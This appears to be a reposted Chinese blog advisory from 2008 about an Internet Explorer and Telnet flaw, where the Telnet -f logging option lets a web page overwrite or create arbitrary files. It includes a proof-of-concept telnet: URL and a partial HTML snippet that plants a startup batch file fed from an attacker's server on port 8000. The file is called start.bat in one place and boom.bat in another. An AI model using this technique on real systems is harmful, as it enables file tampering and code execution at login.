Chinaunix首页 | 论坛 | 博客
  • 博客访问: 18670821
  • 博文数量: 7460
  • 博客积分: 10434
  • 博客等级: 上将
  • 技术积分: 78178
  • 用 户 组: 普通用户
  • 注册时间: 2008-03-02 22:54
文章分类

全部博文(7460)

文章存档

2011年(1)

2009年(669)

2008年(6790)

分类: 网络与安全

2008-05-31 21:02:14

涉及程序:
  Intetnet Explorer , Telnet Client
  描述:
  通过 IE 调用 Telnet 执行攻击者代码漏洞
  详细:
  通过 IE 调用 Telnet 时存在一个安全漏洞。设计中,用户可以通过 IE 来调用 Telnet。但是在 Windows NT 4.0 或 Windows 2000 中,如果 Telnet 客户端是作为 Services for Unix (SFU) 2.0 的一部分安装,这样 WEB 站点指定的任意命令行选项都可以通过 IE 来调用 Telnet。当IE执行‘TELNET’命令时,它将命令行参数传给 TELNET 程序。WINDOWS2000 TELNET 客户端包含一个客户方日志选项,它是根据其选项来记录 TELNET 数据的。通过在 TELNET 命令中指定“-f‘ 选项,所有的过程都能被记录到这个文件。利用此漏洞,攻击者能重写任意文件,或创建文件。
  以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
  在 IE 地址栏键入:telnet:-f%20\file.txt%20host
  将使 IE 激起 TELNET 客户端,记录下所有的输出到文件“\file.txt"中。通过建立一个伪服务器(如NETCAT),攻击者能将任意代码写入这个文件。并且,TELNE CLIENT能隐藏在HTML中自动执行。此漏洞也通过 OUTLOOK 执行,因为在缺省状态下,OUTLOOK 会自动执行 HTML 信息。
  
  
  
  
    \start%20menu\programs\startup\start.bat%20host%208000>
  
  
  这将会使来自8000端口的数据被写入文件“boom.bat”(此文件位于所有使用者的起始目录)。若登录用户有适当的权限就有可能创建一个批处理文件,当下一个用户登录时它将会被自动执行。
  受影响系统:
  带有为 UNIX2.0 服务的所有 IE 版本
阅读(316) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~